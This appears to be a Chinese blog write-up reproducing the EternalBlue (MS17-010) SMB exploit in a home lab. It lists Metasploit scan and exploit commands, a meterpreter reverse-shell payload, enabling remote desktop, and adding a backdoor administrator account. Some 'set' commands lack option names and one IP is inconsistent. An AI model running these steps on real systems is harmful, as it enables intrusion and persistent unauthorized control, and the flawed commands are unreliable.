永恒之蓝复现

MS17-010(Eternal blue永恒之蓝)

漏洞介绍:

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

准备环境:

1
2
3
4
5
6
kali ip:192.168.135.128
win7 ip:192.168.135.140
前提是确保该版本的win7没有打永恒之蓝的补丁,或者关闭防火墙并开启访问服务
win7访问服务开启:
win+r
输入gpedit.msc

image-20211115094850172

image-20211115094951540

image-20211115095714402

msfconsole(美少妇)

我们首先先用nmap扫描一下漏洞,

发现扫出来的几个漏洞里边就包含ms17-010

image-20211115100738467

打开msfconsole并且搜索该漏洞的利用方式

image-20211115100033371

image-20211115100842320

发现他给出了四个利用的模块,我们先用scan模块进行扫描

1
use auxiliary/scanner/smb/smb_ms17_010

查看配置信息

1
options

image-20211115101231836

然后根据设置信息里边的要求(required)设置信息

rhost给的解释就是目标的ip,其他的用默认的就可以

image-20211115101814422

显示扫描成功(如果在这个地方出错了可以去关闭目标机器的防火墙和杀毒软件什么的)

然后我们换成攻击模块

1
use exploit/windows/smb/ms17_010_eternalblue

image-20211115102155153

1
2
3
4
5
6
7
8
9
10
设置目标机ip
set 192.168.135.140
设置攻击载荷
set windows/x64/meterpreter/reverse_tcp
设置监听机ip
set 192.168.135.128
运行
exploit

(其实这几步除了第一步其他的操作基本都是options中默认的,也可以不设置)

image-20211115102610121

这样就是成功进入了

sysinfo查看系统信息

image-20211115102813068

screenshot抓取桌面图片

image-20211115104027060

image-20211115104041763

反弹shell

如果出现乱码的话可以执行chcp 65001

image-20211115104411116

远程连接

用meterpreter打开3389远程桌面端口

1
run getgui -e

image-20211115142326527

然后shell进入系统,添加管理员用户

1
2
3
4
5
6
7
8
进入目录
shell
查看当前用户
net user
添加一个名为admin密码为123456的用户
net user admin 123456 /add
把admin用户添加到管理员组中
net localgroup administrators admin /add

然后远程连接就OK

1
2
rdesktop 192.168.135.143
(这个命令在操作终端执行)

image-20211115142740943

后渗透方面的知识推荐大佬博客:https://www.wwwbuild.net/gh_242b9b127aec/55053.html